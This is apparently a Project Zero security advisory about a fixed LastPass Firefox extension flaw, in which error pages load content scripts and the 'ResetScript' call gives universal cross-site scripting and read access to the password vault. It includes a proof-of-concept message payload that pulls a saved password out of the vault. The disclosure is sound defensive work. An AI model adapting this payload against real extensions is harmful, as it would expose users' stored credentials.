New issue
Advanced search Search tips

Issue 1217 link

Starred by 5 users

Issue metadata

Status: Fixed
Closed: May 2017

Sign in to add a comment

LastPass: FireFox error pages still load Content Scripts, allowing access to ExtensionProxyService

Project Member Reported by, Mar 21 2017

Issue description

The fix for  issue 1209  was to prevent loading the special domain ``. This works in Chrome, but FireFox loads content scripts into error pages, allowing a similar vulnerability to be exploited.

The list of procedure calls available is completely different, but I noticed that the procedure `ResetScript` will load an arbitrary URL, and then run arbitrary script in it.

This is effectively a UXSS, allowing anyone to compromise any website. But...because the URL being opened is from an extension, it can open non-websafe URLS, e.g. resource://support-at-lastpass-dot-com/data/vault.html. This allows a simple demo where your password can be read back from the vault, e.g.:

            type: "ResetScript",
            data: [
                    appId: 1,
                    url: "resource://support-at-lastpass-dot-com/data/vault.html",
                    appName: "exploit",
                    username: "root",
                    script: 'javascript:setTimeout(\'document.getElementsByClassName("itemButton edit")[1].click()\', 1000);' 
                        +   'setTimeout(\'alert(document.getElementById("siteDialogPassword").value)\',2000);'
                        +   'throw 1;'
        }, "*")

I uploaded a demo version here (this URL is secret):

It reliably alert()s the password for a random site in my vault.

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.

Windows 7-2017-03-21-15-28-52.png
128 KB View Download
Project Member

Comment 1 by, Mar 22 2017

Labels: -Restrict-View-Commit
It looks like LastPass have released 4.1.36a which fixes this issue.

Firefox users should be automatically updated.

Thanks to LastPass for another super quick response.

Sidenote: I think it might be a Mozilla bug that neterror pages load content scripts, it feels unintentional. I'll file a low-priority bugzilla bug later today.
Project Member

Comment 2 by, May 4 2017

Status: Fixed (was: New)

Comment 3 Deleted

Sign in to add a comment